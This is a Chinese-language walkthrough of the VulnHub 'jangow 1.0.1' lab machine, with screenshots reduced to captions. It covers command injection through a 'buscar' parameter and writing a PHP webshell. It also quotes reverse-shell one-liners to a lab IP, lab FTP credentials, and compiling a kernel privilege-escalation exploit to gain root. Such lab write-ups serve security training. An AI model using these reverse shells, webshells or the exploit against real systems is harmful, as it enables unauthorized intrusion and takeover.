vulnhub:jangow1.0.1靶机

一、信息收集

扫描ip地址

vulnhub:jangow1.0.1靶机_第1张图片

扫描开放的端口

vulnhub:jangow1.0.1靶机_第2张图片

访问80端口

vulnhub:jangow1.0.1靶机_第3张图片

网站指纹识别,没找到CMS

vulnhub:jangow1.0.1靶机_第4张图片

扫描目录

vulnhub:jangow1.0.1靶机_第5张图片

二、信息利用

在主页发现buscar参数可疑

vulnhub:jangow1.0.1靶机_第6张图片

试试参数,发现可以执行命令

vulnhub:jangow1.0.1靶机_第7张图片

vulnhub:jangow1.0.1靶机_第8张图片

反弹shell:

nc -e /bin/bash 192.168.72.128 9696

bash -i >& /dev/tcp/192.168.72.128/9696 0>&1

无法反弹shell

三、漏洞攻击

试试写入一句话木马

echo "" > ./one.php

vulnhub:jangow1.0.1靶机_第9张图片

vulnhub:jangow1.0.1靶机_第10张图片

蚁剑链接木马文件

vulnhub:jangow1.0.1靶机_第11张图片

在网站家目录找到第一个flag

vulnhub:jangow1.0.1靶机_第12张图片

又发现两个文件内容含有账号密码

vulnhub:jangow1.0.1靶机_第13张图片

vulnhub:jangow1.0.1靶机_第14张图片

尝试登录ftp,使用上面的两个账户密码

vulnhub:jangow1.0.1靶机_第15张图片

vulnhub:jangow1.0.1靶机_第16张图片

账户: jangow01  密码:abygurl69 ,登录成功没有什么发现

反弹shell,nc -e参数不支持,bash -i也不支持

vulnhub:jangow1.0.1靶机_第17张图片

换个语句:&1|nc 192.168.72.128 9696 >/tmp/f");?>

写入文件2.php,并用浏览器访问2.php,进行反弹用户的shell

vulnhub:jangow1.0.1靶机_第18张图片

vulnhub:jangow1.0.1靶机_第19张图片

vulnhub:jangow1.0.1靶机_第20张图片

发现反弹不成功,试了很多反弹命令都不成功,可能是端口限制

试试https的443与http的80、一般服务器都不会限制这些端口,访问2.php并监听443

vulnhub:jangow1.0.1靶机_第21张图片

成功反弹shell,查看系统的版本内核信息

四、提权

查询系统版本的漏洞

vulnhub:jangow1.0.1靶机_第22张图片

下载脚本到当前位置

vulnhub:jangow1.0.1靶机_第23张图片

查看脚本文件的使用方法

vulnhub:jangow1.0.1靶机_第24张图片

将45010.c通过蚁剑上传到靶机目录下(建议把源文件先上传到靶机再编译)

vulnhub:jangow1.0.1靶机_第25张图片

赋予执行文件执行权限

chmod +x 45010.c

vulnhub:jangow1.0.1靶机_第26张图片

编译45010.c文件

gcc 45010.c -o 45010

vulnhub:jangow1.0.1靶机_第27张图片

执行编译后的文件

vulnhub:jangow1.0.1靶机_第28张图片

拿到root权限

vulnhub:jangow1.0.1靶机_第29张图片

完成。

你可能感兴趣的:(vulnhub靶机,服务器,运维)